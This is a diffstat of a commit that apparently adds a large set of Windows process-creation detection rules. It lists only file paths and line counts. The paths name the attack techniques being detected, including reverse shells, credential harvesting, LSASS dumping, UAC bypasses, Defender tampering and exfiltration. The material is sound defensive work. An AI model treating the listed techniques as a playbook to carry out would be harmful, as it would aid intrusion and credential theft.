.../proc_creation_win_net_share_unmount.yml | 36 + .../proc_creation_win_net_start_service.yml | 34 + .../proc_creation_win_net_stop_service.yml | 34 + .../proc_creation_win_net_susp_execution.yml | 62 + ...creation_win_net_use_mount_admin_share.yml | 39 + ...ation_win_net_use_mount_internet_share.yml | 36 + .../proc_creation_win_net_use_mount_share.yml | 39 + ...reation_win_net_use_password_plaintext.yml | 44 + .../proc_creation_win_net_user_add.yml | 45 + ...creation_win_net_user_add_never_expire.yml | 40 + .../proc_creation_win_netsh_fw_add_rule.yml | 38 + ...etsh_fw_allow_program_in_susp_location.yml | 66 + .../proc_creation_win_netsh_fw_allow_rdp.yml | 40 + ...proc_creation_win_netsh_fw_delete_rule.yml | 36 + .../proc_creation_win_netsh_fw_disable.yml | 45 + ...reation_win_netsh_fw_enable_group_rule.yml | 38 + ..._creation_win_netsh_fw_rules_discovery.yml | 39 + .../proc_creation_win_netsh_fw_set_rule.yml | 33 + ...ation_win_netsh_helper_dll_persistence.yml | 42 + ...proc_creation_win_netsh_packet_capture.yml | 34 + ...roc_creation_win_netsh_port_forwarding.yml | 51 + ...reation_win_netsh_port_forwarding_3389.yml | 36 + ...n_win_netsh_wifi_credential_harvesting.yml | 36 + .../proc_creation_win_nltest_execution.yml | 34 + .../proc_creation_win_nltest_recon.yml | 56 + .../proc_creation_win_node_abuse.yml | 40 + ...on_win_node_adobe_creative_cloud_abuse.yml | 33 + ...creation_win_nslookup_domain_discovery.yml | 30 + ...eation_win_nslookup_poweshell_download.yml | 39 + .../proc_creation_win_ntdsutil_susp_usage.yml | 43 + .../proc_creation_win_ntdsutil_usage.yml | 27 + ...c_creation_win_odbcconf_driver_install.yml | 37 + ...ation_win_odbcconf_driver_install_susp.yml | 37 + ...ation_win_odbcconf_exec_susp_locations.yml | 55 + ...ation_win_odbcconf_register_dll_regsvr.yml | 40 + ..._win_odbcconf_register_dll_regsvr_susp.yml | 37 + ...oc_creation_win_odbcconf_response_file.yml | 41 + ...eation_win_odbcconf_response_file_susp.yml | 46 + ...on_win_odbcconf_uncommon_child_process.yml | 29 + ...tion_win_office_arbitrary_cli_download.yml | 44 + ...win_office_excel_dcom_lateral_movement.yml | 38 + ...win_office_exec_from_trusted_locations.yml | 55 + ...in_office_onenote_susp_child_processes.yml | 130 + ...utlook_enable_unsafe_client_mail_rules.yml | 33 + ...win_office_outlook_execution_from_temp.yml | 28 + ...in_office_outlook_susp_child_processes.yml | 71 + ...ce_outlook_susp_child_processes_remote.yml | 34 + ..._office_spawn_exe_from_users_directory.yml | 45 + ...eation_win_office_susp_child_processes.yml | 140 + ...c_creation_win_office_winword_dll_load.yml | 35 + ...flinescannershell_mpclient_sideloading.yml | 36 + .../proc_creation_win_pdqdeploy_execution.yml | 35 + ...ion_win_pdqdeploy_runner_susp_children.yml | 60 + ...tion_win_perl_inline_command_execution.yml | 30 + ...ation_win_php_inline_command_execution.yml | 31 + .../proc_creation_win_ping_hex_ip.yml | 32 + .../proc_creation_win_pktmon_execution.yml | 28 + ...roc_creation_win_plink_port_forwarding.yml | 31 + ...proc_creation_win_plink_susp_tunneling.yml | 38 + .../proc_creation_win_powercfg_execution.yml | 39 + ...ershell_aadinternals_cmdlets_execution.yml | 62 + ...ell_active_directory_module_dll_import.yml | 45 + ..._win_powershell_add_windows_capability.yml | 39 + ...win_powershell_amsi_init_failed_bypass.yml | 38 + ...n_win_powershell_amsi_null_bits_bypass.yml | 32 + ..._creation_win_powershell_audio_capture.yml | 34 + ...tion_win_powershell_base64_encoded_cmd.yml | 49 + ...win_powershell_base64_frombase64string.yml | 34 + ...roc_creation_win_powershell_base64_iex.yml | 51 + ..._creation_win_powershell_base64_invoke.yml | 50 + ...ion_win_powershell_base64_mppreference.yml | 47 + ...rshell_base64_reflection_assembly_load.yml | 52 + ...base64_reflection_assembly_load_obfusc.yml | 60 + ...tion_win_powershell_base64_wmi_classes.yml | 81 + ..._creation_win_powershell_cl_invocation.yml | 29 + ...reation_win_powershell_cl_loadassembly.yml | 31 + ...ation_win_powershell_cl_mutexverifiers.yml | 37 + ...ershell_cmdline_convertto_securestring.yml | 37 + ...in_powershell_cmdline_reversed_strings.yml | 69 + ..._powershell_cmdline_special_characters.yml | 47 + ...hell_computer_discovery_get_adcomputer.yml | 47 + ...creation_win_powershell_create_service.yml | 33 + ...oc_creation_win_powershell_decode_gzip.yml | 28 + ...reation_win_powershell_decrypt_pattern.yml | 55 + ...in_powershell_defender_disable_feature.yml | 91 + ...tion_win_powershell_defender_exclusion.yml | 41 + ...isable_defender_av_security_monitoring.yml | 54 + ...eation_win_powershell_disable_firewall.yml | 47 + ...ion_win_powershell_disable_ie_features.yml | 37 + ..._creation_win_powershell_dll_execution.yml | 45 + ...eation_win_powershell_downgrade_attack.yml | 40 + ...on_win_powershell_download_com_cradles.yml | 42 + ...eation_win_powershell_download_cradles.yml | 33 + ...c_creation_win_powershell_download_dll.yml | 34 + ...c_creation_win_powershell_download_iex.yml | 44 + ...ation_win_powershell_download_patterns.yml | 44 + ...oc_creation_win_powershell_email_exfil.yml | 35 + ...l_enable_susp_windows_optional_feature.yml | 44 + .../proc_creation_win_powershell_encode.yml | 43 + ...on_win_powershell_encoded_cmd_patterns.yml | 51 + ...creation_win_powershell_encoded_obfusc.yml | 58 + ...ation_win_powershell_encoding_patterns.yml | 58 + ...creation_win_powershell_exec_data_file.yml | 37 + ...tion_win_powershell_export_certificate.yml | 35 + ...eation_win_powershell_frombase64string.yml | 29 + ...in_powershell_frombase64string_archive.yml | 32 + ..._creation_win_powershell_get_clipboard.yml | 31 + ...powershell_get_localgroup_member_recon.yml | 44 + ...eation_win_powershell_getprocess_lsass.yml | 31 + ...creation_win_powershell_hidden_b64_cmd.yml | 84 + ...wershell_hide_services_via_set_service.yml | 44 + ...c_creation_win_powershell_iex_patterns.yml | 47 + ..._powershell_import_cert_susp_locations.yml | 38 + ...win_powershell_import_module_susp_dirs.yml | 44 + ...ershell_install_unsigned_appx_packages.yml | 41 + ...ion_win_powershell_invocation_specific.yml | 76 + ...powershell_invoke_webrequest_direct_ip.yml | 50 + ..._powershell_invoke_webrequest_download.yml | 57 + ...ion_win_powershell_mailboxexport_share.yml | 35 + ...ation_win_powershell_malicious_cmdlets.yml | 248 + ..._powershell_msexchange_transport_agent.yml | 32 + ...n_powershell_non_interactive_execution.yml | 47 + ...on_win_powershell_obfuscation_via_utf8.yml | 29 + ..._creation_win_powershell_public_folder.yml | 44 + ...wershell_remotefxvgpudisablement_abuse.yml | 37 + ...in_powershell_reverse_shell_connection.yml | 39 + ...ion_win_powershell_run_script_from_ads.yml | 35 + ...owershell_run_script_from_input_stream.yml | 32 + ...roc_creation_win_powershell_sam_access.yml | 37 + ...on_win_powershell_script_engine_parent.yml | 35 + ..._service_dacl_modification_set_service.yml | 45 + .../proc_creation_win_powershell_set_acl.yml | 43 + ...n_win_powershell_set_acl_susp_location.yml | 54 + ...ershell_set_policies_to_unsecure_level.yml | 51 + ...on_win_powershell_set_service_disabled.yml | 35 + ...ion_win_powershell_shadowcopy_deletion.yml | 46 + ...reation_win_powershell_snapins_hafnium.yml | 46 + ...c_creation_win_powershell_stop_service.yml | 34 + ...on_win_powershell_susp_child_processes.yml | 49 + ..._win_powershell_susp_download_patterns.yml | 37 + ...in_powershell_susp_parameter_variation.yml | 138 + ...ion_win_powershell_susp_parent_process.yml | 66 + ...reation_win_powershell_susp_ps_appdata.yml | 39 + ...on_win_powershell_susp_ps_downloadfile.yml | 33 + ...ll_tamper_defender_remove_mppreference.yml | 35 + ...ation_win_powershell_token_obfuscation.yml | 38 + ...n_powershell_user_discovery_get_aduser.yml | 46 + ...eation_win_powershell_webclient_casing.yml | 179 + ...creation_win_powershell_x509enrollment.yml | 33 + ...reation_win_powershell_xor_commandline.yml | 56 + ...c_creation_win_powershell_zip_compress.yml | 40 + ...creation_win_presentationhost_download.yml | 34 + ...resentationhost_uncommon_location_exec.yml | 36 + ...ation_win_pressanykey_lolbin_execution.yml | 32 + ...oc_creation_win_print_remote_file_copy.yml | 34 + ..._creation_win_protocolhandler_download.yml | 35 + ...reation_win_provlaunch_potential_abuse.yml | 55 + ...tion_win_provlaunch_susp_child_process.yml | 54 + ...c_creation_win_psr_capture_screenshots.yml | 32 + ...proc_creation_win_pua_3proxy_execution.yml | 32 + ...oc_creation_win_pua_adfind_enumeration.yml | 44 + ...roc_creation_win_pua_adfind_susp_usage.yml | 61 + ...c_creation_win_pua_advanced_ip_scanner.yml | 39 + ...creation_win_pua_advanced_port_scanner.yml | 35 + .../proc_creation_win_pua_advancedrun.yml | 44 + ...creation_win_pua_advancedrun_priv_user.yml | 47 + .../proc_creation_win_pua_chisel.yml | 44 + .../proc_creation_win_pua_cleanwipe.yml | 38 + .../proc_creation_win_pua_crassus.yml | 28 + .../proc_creation_win_pua_csexec.yml | 32 + .../proc_creation_win_pua_defendercheck.yml | 28 + .../proc_creation_win_pua_ditsnap.yml | 29 + .../proc_creation_win_pua_frp.yml | 41 + .../proc_creation_win_pua_iox.yml | 42 + ...c_creation_win_pua_mouselock_execution.yml | 35 + .../proc_creation_win_pua_netcat.yml | 46 + .../proc_creation_win_pua_ngrok.yml | 57 + .../proc_creation_win_pua_nimgrab.yml | 36 + .../proc_creation_win_pua_nircmd.yml | 48 + ...proc_creation_win_pua_nircmd_as_system.yml | 33 + .../proc_creation_win_pua_nmap_zenmap.yml | 33 + .../proc_creation_win_pua_nps.yml | 43 + .../proc_creation_win_pua_nsudo.yml | 53 + .../proc_creation_win_pua_pingcastle.yml | 190 + ...ation_win_pua_pingcastle_script_parent.yml | 95 + .../proc_creation_win_pua_process_hacker.yml | 68 + .../proc_creation_win_pua_radmin.yml | 31 + ...proc_creation_win_pua_rcedit_execution.yml | 46 + ...proc_creation_win_pua_rclone_execution.yml | 64 + .../proc_creation_win_pua_runxcmd.yml | 36 + .../proc_creation_win_pua_seatbelt.yml | 61 + .../proc_creation_win_pua_system_informer.yml | 50 + ...oc_creation_win_pua_webbrowserpassview.yml | 28 + ..._creation_win_pua_wsudo_susp_execution.yml | 38 + .../proc_creation_win_python_adidnsdump.yml | 30 + ...on_win_python_inline_command_execution.yml | 41 + .../proc_creation_win_python_pty_spawn.yml | 38 + .../proc_creation_win_query_session_exfil.yml | 29 + .../proc_creation_win_rar_compress_data.yml | 29 + ...tion_win_rar_compression_with_password.yml | 34 + ...eation_win_rar_susp_greedy_compression.yml | 47 + .../proc_creation_win_rasdial_execution.yml | 28 + ...eation_win_rdrleakdiag_process_dumping.yml | 47 + .../proc_creation_win_reg_add_run_key.yml | 33 + .../proc_creation_win_reg_add_safeboot.yml | 36 + .../proc_creation_win_reg_bitlocker.yml | 41 + ..._credential_access_via_password_filter.yml | 31 + ...oc_creation_win_reg_defender_exclusion.yml | 38 + .../proc_creation_win_reg_delete_safeboot.yml | 35 + .../proc_creation_win_reg_delete_services.yml | 33 + ...tion_win_reg_desktop_background_change.yml | 59 + ...direct_asep_registry_keys_modification.yml | 41 + ..._creation_win_reg_disable_sec_services.yml | 50 + ...eation_win_reg_dumping_sensitive_hives.yml | 64 + ...numeration_for_credentials_in_registry.yml | 43 + ...n_win_reg_import_from_suspicious_paths.yml | 42 + ...n_win_reg_lsa_disable_restricted_admin.yml | 36 + ...on_win_reg_lsa_ppl_protection_disabled.yml | 34 + .../proc_creation_win_reg_machineguid.yml | 30 + ...n_win_reg_modify_group_policy_settings.yml | 41 + .../proc_creation_win_reg_nolmhash.yml | 37 + .../proc_creation_win_reg_open_command.yml | 44 + .../proc_creation_win_reg_query_registry.yml | 39 + .../proc_creation_win_reg_rdp_keys_tamper.yml | 53 + .../proc_creation_win_reg_screensaver.yml | 58 + ...ation_win_reg_service_imagepath_change.yml | 38 + ...oc_creation_win_reg_software_discovery.yml | 36 + .../proc_creation_win_reg_susp_paths.yml | 40 + .../proc_creation_win_reg_volsnap_disable.yml | 29 + ...eation_win_reg_windows_defender_tamper.yml | 70 + ...reg_write_protect_for_storage_disabled.yml | 31 + ...m_regsvcs_uncommon_extension_execution.yml | 45 + ...sm_regsvcs_uncommon_location_execution.yml | 47 + ...ation_win_regedit_export_critical_keys.yml | 48 + .../proc_creation_win_regedit_export_keys.yml | 48 + .../proc_creation_win_regedit_import_keys.yml | 51 + ...c_creation_win_regedit_import_keys_ads.yml | 48 + ..._creation_win_regedit_trustedinstaller.yml | 30 + .../proc_creation_win_regini_ads.yml | 38 + .../proc_creation_win_regini_execution.yml | 38 + ...tion_win_registry_cimprovider_dll_load.yml | 33 + ...gistry_enumeration_for_credentials_cli.yml | 49 + ...urity_zone_protocol_defaults_downgrade.yml | 36 + ...registry_install_reg_debugger_backdoor.yml | 39 + ...roc_creation_win_registry_logon_script.yml | 30 + ...tion_win_registry_new_network_provider.yml | 39 + ...y_privilege_escalation_via_service_key.yml | 35 + ...gistry_provlaunch_provisioning_command.yml | 34 + ...egistry_set_unsecure_powershell_policy.yml | 39 + ...n_win_registry_typed_paths_persistence.yml | 26 + ...oc_creation_win_regsvr32_flags_anomaly.yml | 34 + ..._creation_win_regsvr32_http_ip_pattern.yml | 68 + ..._creation_win_regsvr32_network_pattern.yml | 41 + ...roc_creation_win_regsvr32_remote_share.yml | 30 + ...eation_win_regsvr32_susp_child_process.yml | 50 + ...creation_win_regsvr32_susp_exec_path_1.yml | 39 + ...creation_win_regsvr32_susp_exec_path_2.yml | 68 + ..._creation_win_regsvr32_susp_extensions.yml | 57 + ...proc_creation_win_regsvr32_susp_parent.yml | 42 + ...eation_win_regsvr32_uncommon_extension.yml | 44 + ...win_remote_access_software_ultraviewer.yml | 31 + ...eation_win_remote_access_tools_anydesk.yml | 36 + ...s_tools_anydesk_piped_password_via_cli.yml | 32 + ...te_access_tools_anydesk_silent_install.yml | 35 + ..._remote_access_tools_anydesk_susp_exec.yml | 41 + ...ion_win_remote_access_tools_gotoopener.yml | 32 + ...eation_win_remote_access_tools_logmein.yml | 32 + ...ion_win_remote_access_tools_netsupport.yml | 33 + ...mote_access_tools_netsupport_susp_exec.yml | 34 + ...ccess_tools_rurat_non_default_location.yml | 33 + ..._win_remote_access_tools_screenconnect.yml | 32 + ...mote_access_tools_screenconnect_access.yml | 32 + ...ote_access_tools_screenconnect_anomaly.yml | 32 + ...access_tools_screenconnect_remote_exec.yml | 33 + ...roc_creation_win_remote_time_discovery.yml | 34 + .../proc_creation_win_renamed_adfind.yml | 65 + .../proc_creation_win_renamed_autohotkey.yml | 44 + .../proc_creation_win_renamed_autoit.yml | 53 + .../proc_creation_win_renamed_binary.yml | 52 + ...ion_win_renamed_binary_highly_relevant.yml | 85 + .../proc_creation_win_renamed_browsercore.yml | 29 + .../proc_creation_win_renamed_cloudflared.yml | 93 + .../proc_creation_win_renamed_createdump.yml | 43 + .../proc_creation_win_renamed_curl.yml | 32 + .../proc_creation_win_renamed_dctask64.yml | 38 + .../proc_creation_win_renamed_ftp.yml | 34 + .../proc_creation_win_renamed_gpg4win.yml | 28 + .../proc_creation_win_renamed_jusched.yml | 32 + .../proc_creation_win_renamed_mavinject.yml | 42 + .../proc_creation_win_renamed_megasync.yml | 30 + .../proc_creation_win_renamed_msdt.yml | 29 + ...oc_creation_win_renamed_netsupport_rat.yml | 31 + ..._creation_win_renamed_office_processes.yml | 54 + .../proc_creation_win_renamed_paexec.yml | 48 + .../proc_creation_win_renamed_pingcastle.yml | 61 + .../proc_creation_win_renamed_plink.yml | 34 + .../proc_creation_win_renamed_pressanykey.yml | 33 + ...win_renamed_rundll32_dllregisterserver.yml | 32 + .../proc_creation_win_renamed_rurat.yml | 34 + ...ion_win_renamed_sysinternals_debugview.yml | 30 + ...tion_win_renamed_sysinternals_procdump.yml | 43 + ...in_renamed_sysinternals_psexec_service.yml | 28 + ...ation_win_renamed_sysinternals_sdelete.yml | 37 + .../proc_creation_win_renamed_vmnat.yml | 29 + .../proc_creation_win_renamed_whoami.yml | 31 + ...reation_win_rpcping_credential_capture.yml | 47 + ...tion_win_ruby_inline_command_execution.yml | 30 + ..._win_rundll32_ads_stored_dll_execution.yml | 33 + ...ndll32_advpack_obfuscated_ordinal_call.yml | 35 + .../proc_creation_win_rundll32_by_ordinal.yml | 52 + .../proc_creation_win_rundll32_inline_vbs.yml | 31 + ...eation_win_rundll32_installscreensaver.yml | 31 + ...ion_win_rundll32_js_runhtmlapplication.yml | 30 + .../proc_creation_win_rundll32_keymgr.yml | 32 + ...win_rundll32_mshtml_runhtmlapplication.yml | 31 + .../proc_creation_win_rundll32_no_params.yml | 35 + .../proc_creation_win_rundll32_ntlmrelay.yml | 38 + ...n_win_rundll32_obfuscated_ordinal_call.yml | 31 + ..._creation_win_rundll32_parent_explorer.yml | 33 + ..._win_rundll32_process_dump_via_comsvcs.yml | 60 + ...on_win_rundll32_registered_com_objects.yml | 37 + ...oc_creation_win_rundll32_run_locations.yml | 39 + .../proc_creation_win_rundll32_script_run.yml | 36 + ...n_rundll32_setupapi_installhinfsection.yml | 39 + ...on_win_rundll32_shell32_susp_execution.yml | 41 + ...rundll32_shelldispatch_potential_abuse.yml | 29 + ...c_creation_win_rundll32_spawn_explorer.yml | 30 + ...oc_creation_win_rundll32_susp_activity.yml | 112 + ...ion_win_rundll32_susp_control_dll_load.yml | 36 + ...32_susp_execution_with_image_extension.yml | 46 + ..._win_rundll32_susp_shellexec_execution.yml | 43 + ...tion_win_rundll32_susp_shimcache_flush.yml | 44 + .../proc_creation_win_rundll32_sys.yml | 31 + .../proc_creation_win_rundll32_unc_path.yml | 32 + ...on_win_rundll32_uncommon_dll_extension.yml | 44 + .../proc_creation_win_rundll32_user32_dll.yml | 36 + ...n_win_rundll32_webdav_client_execution.yml | 35 + ..._rundll32_webdav_client_susp_execution.yml | 59 + ...eation_win_rundll32_without_parameters.yml | 38 + .../proc_creation_win_runonce_execution.yml | 33 + ..._change_sevice_image_path_by_non_admin.yml | 39 + .../proc_creation_win_sc_create_service.yml | 34 + .../proc_creation_win_sc_disable_service.yml | 36 + ...proc_creation_win_sc_new_kernel_driver.yml | 35 + .../proc_creation_win_sc_query.yml | 31 + ...ion_win_sc_sdset_allow_service_changes.yml | 43 + ...ation_win_sc_sdset_deny_service_access.yml | 46 + ...roc_creation_win_sc_sdset_hide_sevices.yml | 48 + ...roc_creation_win_sc_sdset_modification.yml | 40 + ...ation_win_sc_service_path_modification.yml | 58 + ..._win_sc_service_tamper_for_persistence.yml | 60 + .../proc_creation_win_sc_stop_service.yml | 37 + ...tion_win_schtasks_appdata_local_system.yml | 45 + .../proc_creation_win_schtasks_change.yml | 77 + .../proc_creation_win_schtasks_creation.yml | 39 + ...tion_win_schtasks_creation_temp_folder.yml | 36 + .../proc_creation_win_schtasks_delete.yml | 43 + .../proc_creation_win_schtasks_delete_all.yml | 30 + .../proc_creation_win_schtasks_disable.yml | 45 + .../proc_creation_win_schtasks_env_folder.yml | 78 + ...oc_creation_win_schtasks_folder_combos.yml | 44 + ...c_creation_win_schtasks_guid_task_name.yml | 40 + ...n_schtasks_one_time_only_midnight_task.yml | 44 + .../proc_creation_win_schtasks_parent.yml | 37 + ...schtasks_persistence_windows_telemetry.yml | 37 + ...on_win_schtasks_powershell_persistence.yml | 40 + .../proc_creation_win_schtasks_reg_loader.yml | 49 + ...eation_win_schtasks_reg_loader_encoded.yml | 47 + ...oc_creation_win_schtasks_schedule_type.yml | 43 + ...tion_win_schtasks_schedule_type_system.yml | 42 + ...asks_schedule_via_masqueraded_xml_file.yml | 55 + ...roc_creation_win_schtasks_susp_pattern.yml | 68 + .../proc_creation_win_schtasks_system.yml | 53 + ...reation_win_scrcons_susp_child_process.yml | 44 + ..._creation_win_sdbinst_shim_persistence.yml | 42 + ...oc_creation_win_sdbinst_susp_extension.yml | 49 + .../proc_creation_win_sdclt_child_process.yml | 28 + ...roc_creation_win_sdiagnhost_susp_child.yml | 44 + .../proc_creation_win_secedit_execution.yml | 56 + ..._creation_win_servu_susp_child_process.yml | 44 + ...oc_creation_win_setspn_spn_enumeration.yml | 36 + .../proc_creation_win_shutdown_execution.yml | 30 + .../proc_creation_win_shutdown_logoff.yml | 28 + ...eation_win_sndvol_susp_child_processes.yml | 28 + ...eation_win_soundrecorder_audio_capture.yml | 29 + ...proc_creation_win_splwow64_cli_anomaly.yml | 28 + ...ation_win_spoolsv_susp_child_processes.yml | 88 + ...roc_creation_win_sqlcmd_veeam_db_recon.yml | 38 + .../proc_creation_win_sqlcmd_veeam_dump.yml | 33 + ...ation_win_sqlite_chromium_profile_data.yml | 46 + ..._win_sqlite_firefox_gecko_profile_data.yml | 37 + .../proc_creation_win_squirrel_download.yml | 45 + ..._creation_win_squirrel_proxy_execution.yml | 73 + .../proc_creation_win_ssh_port_forward.yml | 33 + .../proc_creation_win_ssh_rdp_tunneling.yml | 31 + .../proc_creation_win_ssm_agent_abuse.yml | 34 + ...eation_win_stordiag_susp_child_process.yml | 36 + ...oc_creation_win_susp_16bit_application.yml | 31 + ...ation_win_susp_abusing_debug_privilege.yml | 56 + ...on_win_susp_add_user_local_admin_group.yml | 41 + ...win_susp_add_user_remote_desktop_group.yml | 46 + ...eation_win_susp_alternate_data_streams.yml | 49 + ...ays_install_elevated_windows_installer.yml | 56 + .../proc_creation_win_susp_appx_execution.yml | 53 + ...ary_shell_execution_via_settingcontent.yml | 35 + ...reation_win_susp_archiver_iso_phishing.yml | 34 + ...creation_win_susp_automated_collection.yml | 49 + ...n_susp_bad_opsec_sacrificial_processes.yml | 65 + ...tion_win_susp_child_process_as_system_.yml | 47 + ...n_win_susp_cli_obfuscation_escape_char.yml | 34 + ...ation_win_susp_cli_obfuscation_unicode.yml | 53 + ...usp_commandline_path_traversal_evasion.yml | 39 + ...oc_creation_win_susp_copy_browser_data.yml | 74 + ...reation_win_susp_copy_lateral_movement.yml | 65 + ...proc_creation_win_susp_copy_system_dir.yml | 58 + ...eation_win_susp_copy_system_dir_lolbin.yml | 65 + ...creation_win_susp_crypto_mining_monero.yml | 51 + ...ion_win_susp_data_exfiltration_via_cli.yml | 72 + ...proc_creation_win_susp_disable_raccine.yml | 39 + ...roc_creation_win_susp_double_extension.yml | 72 + ...ation_win_susp_double_extension_parent.yml | 68 + ...eation_win_susp_download_office_domain.yml | 43 + ...reation_win_susp_dumpstack_log_evasion.yml | 28 + ...on_win_susp_elavated_msi_spawned_shell.yml | 42 + ...reation_win_susp_electron_app_children.yml | 108 + ...tion_win_susp_electron_exeuction_proxy.yml | 66 + ..._elevated_system_shell_uncommon_parent.yml | 74 + .../proc_creation_win_susp_embed_exe_lnk.yml | 30 + ...tion_win_susp_etw_modification_cmdline.yml | 38 + ...oc_creation_win_susp_etw_trace_evasion.yml | 58 + .../proc_creation_win_susp_eventlog_clear.yml | 64 + ...eation_win_susp_eventlog_content_recon.yml | 85 + ..._susp_execution_from_guid_folder_names.yml | 46 + ...execution_from_public_folder_as_parent.yml | 46 + .../proc_creation_win_susp_execution_path.yml | 57 + ...tion_win_susp_execution_path_webserver.yml | 38 + ...creation_win_susp_file_characteristics.yml | 40 + ...win_susp_gather_network_info_execution.yml | 38 + ...n_win_susp_hidden_dir_index_allocation.yml | 35 + ...in_susp_hiding_malware_in_fonts_folder.yml | 57 + ...win_susp_homoglyph_cyrillic_lookalikes.yml | 82 + .../proc_creation_win_susp_image_missing.yml | 42 + ...ation_win_susp_inline_base64_mz_header.yml | 30 + ...reation_win_susp_inline_win_api_access.yml | 80 + ...p_local_system_owner_account_discovery.yml | 63 + ..._win_susp_lolbin_exec_from_non_c_drive.yml | 57 + ...eation_win_susp_lsass_dmp_cli_keywords.yml | 54 + ...tion_win_susp_ms_appinstaller_download.yml | 34 + ...proc_creation_win_susp_network_command.yml | 33 + ...oc_creation_win_susp_network_scan_loop.yml | 36 + ...roc_creation_win_susp_network_sniffing.yml | 34 + .../proc_creation_win_susp_non_exe_image.yml | 85 + ...c_creation_win_susp_non_priv_reg_or_ps.yml | 48 + .../proc_creation_win_susp_ntds.yml | 77 + ...creation_win_susp_nteventlogfile_usage.yml | 39 + ..._win_susp_ntfs_short_name_path_use_cli.yml | 50 + ...in_susp_ntfs_short_name_path_use_image.yml | 51 + ...ation_win_susp_ntfs_short_name_use_cli.yml | 55 + ...ion_win_susp_ntfs_short_name_use_image.yml | 62 + ...eation_win_susp_obfuscated_ip_download.yml | 59 + ...reation_win_susp_obfuscated_ip_via_cli.yml | 54 + ..._creation_win_susp_office_token_search.yml | 30 + .../proc_creation_win_susp_parents.yml | 49 + ...in_susp_priv_escalation_via_named_pipe.yml | 40 + ...c_creation_win_susp_private_keys_recon.yml | 54 + ...susp_privilege_escalation_cli_patterns.yml | 43 + ...oc_creation_win_susp_proc_wrong_parent.yml | 54 + .../proc_creation_win_susp_progname.yml | 74 + .../proc_creation_win_susp_recon.yml | 42 + ...on_win_susp_recycle_bin_fake_execution.yml | 34 + ...on_win_susp_redirect_local_admin_share.yml | 32 + ...tion_win_susp_remote_desktop_tunneling.yml | 33 + ...eation_win_susp_right_to_left_override.yml | 30 + ...n_win_susp_script_exec_from_env_folder.yml | 63 + ...reation_win_susp_script_exec_from_temp.yml | 47 + ...roc_creation_win_susp_service_creation.yml | 60 + .../proc_creation_win_susp_service_dir.yml | 41 + .../proc_creation_win_susp_service_tamper.yml | 245 + ...eation_win_susp_shadow_copies_creation.yml | 43 + ...eation_win_susp_shadow_copies_deletion.yml | 74 + ...tion_win_susp_shell_spawn_susp_program.yml | 75 + .../proc_creation_win_susp_sysnative.yml | 29 + ...c_creation_win_susp_system_exe_anomaly.yml | 97 + ..._creation_win_susp_system_user_anomaly.yml | 103 + .../proc_creation_win_susp_sysvol_access.yml | 30 + ..._creation_win_susp_task_folder_evasion.yml | 44 + .../proc_creation_win_susp_use_of_te_bin.yml | 32 + ...tion_win_susp_use_of_vsjitdebugger_bin.yml | 36 + .../proc_creation_win_susp_userinit_child.yml | 35 + ...tion_win_susp_weak_or_abused_passwords.yml | 36 + ...n_win_susp_web_request_cmd_and_cmdlets.yml | 46 + ...proc_creation_win_susp_whoami_as_param.yml | 28 + .../proc_creation_win_susp_workfolders.yml | 30 + ...in_svchost_execution_with_no_cli_flags.yml | 37 + ...eation_win_svchost_termserv_proc_spawn.yml | 40 + ...on_win_svchost_uncommon_parent_process.yml | 39 + ...sinternals_accesschk_check_permissions.yml | 46 + ..._win_sysinternals_adexplorer_execution.yml | 33 + ...sysinternals_adexplorer_susp_execution.yml | 40 + ...reation_win_sysinternals_eula_accepted.yml | 33 + ...tion_win_sysinternals_livekd_execution.yml | 28 + ...sysinternals_livekd_kernel_memory_dump.yml | 34 + ...roc_creation_win_sysinternals_procdump.yml | 30 + ...tion_win_sysinternals_procdump_evasion.yml | 42 + ...eation_win_sysinternals_procdump_lsass.yml | 37 + ...tion_win_sysinternals_psexec_execution.yml | 29 + ...nternals_psexec_paexec_escalate_system.yml | 74 + ...n_sysinternals_psexec_remote_execution.yml | 33 + ...roc_creation_win_sysinternals_psexesvc.yml | 31 + ...on_win_sysinternals_psexesvc_as_system.yml | 32 + ...oc_creation_win_sysinternals_psloglist.yml | 53 + ...oc_creation_win_sysinternals_psservice.yml | 31 + ...n_win_sysinternals_pssuspend_execution.yml | 34 + ..._sysinternals_pssuspend_susp_execution.yml | 36 + ...proc_creation_win_sysinternals_sdelete.yml | 38 + ..._sysinternals_susp_psexec_paexec_flags.yml | 76 + ..._win_sysinternals_sysmon_config_update.yml | 33 + ...tion_win_sysinternals_sysmon_uninstall.yml | 34 + ...on_win_sysinternals_tools_masquerading.yml | 180 + .../proc_creation_win_sysprep_appdata.yml | 29 + ...proc_creation_win_systeminfo_execution.yml | 29 + ...ettingsadminflows_turn_on_dev_features.yml | 36 + ...roc_creation_win_takeown_recursive_own.yml | 35 + ...proc_creation_win_tapinstall_execution.yml | 33 + .../proc_creation_win_tar_compression.yml | 38 + .../proc_creation_win_tar_extraction.yml | 35 + .../proc_creation_win_taskkill_sep.yml | 35 + ..._creation_win_tasklist_basic_execution.yml | 29 + .../proc_creation_win_taskmgr_localsystem.yml | 28 + ...reation_win_taskmgr_susp_child_process.yml | 34 + ...ms_suspicious_command_line_cred_access.yml | 34 + ...on_win_tpmvscmgr_add_virtual_smartcard.yml | 28 + .../proc_creation_win_tscon_localsystem.yml | 32 + .../proc_creation_win_tscon_rdp_redirect.yml | 31 + ...eation_win_tscon_rdp_session_hijacking.yml | 28 + ..._creation_win_uac_bypass_changepk_slui.yml | 34 + .../proc_creation_win_uac_bypass_cleanmgr.yml | 32 + .../proc_creation_win_uac_bypass_cmstp.yml | 44 + ...win_uac_bypass_cmstp_com_object_access.yml | 44 + ...eation_win_uac_bypass_computerdefaults.yml | 35 + ...eation_win_uac_bypass_consent_comctl32.yml | 32 + .../proc_creation_win_uac_bypass_dismhost.yml | 34 + ...on_win_uac_bypass_eventvwr_recentviews.yml | 35 + ...proc_creation_win_uac_bypass_fodhelper.yml | 32 + ...n_uac_bypass_hijacking_firwall_snap_in.yml | 29 + ...roc_creation_win_uac_bypass_icmluautil.yml | 34 + ...ion_win_uac_bypass_idiagnostic_profile.yml | 32 + .../proc_creation_win_uac_bypass_ieinstal.yml | 33 + ...c_creation_win_uac_bypass_msconfig_gui.yml | 32 + ...tion_win_uac_bypass_ntfs_reparse_point.yml | 42 + ...oc_creation_win_uac_bypass_pkgmgr_dism.yml | 32 + .../proc_creation_win_uac_bypass_sdclt.yml | 30 + ...oc_creation_win_uac_bypass_trustedpath.yml | 28 + .../proc_creation_win_uac_bypass_winsat.yml | 32 + .../proc_creation_win_uac_bypass_wmp.yml | 37 + .../proc_creation_win_uac_bypass_wsreset.yml | 37 + ...win_uac_bypass_wsreset_integrity_level.yml | 33 + 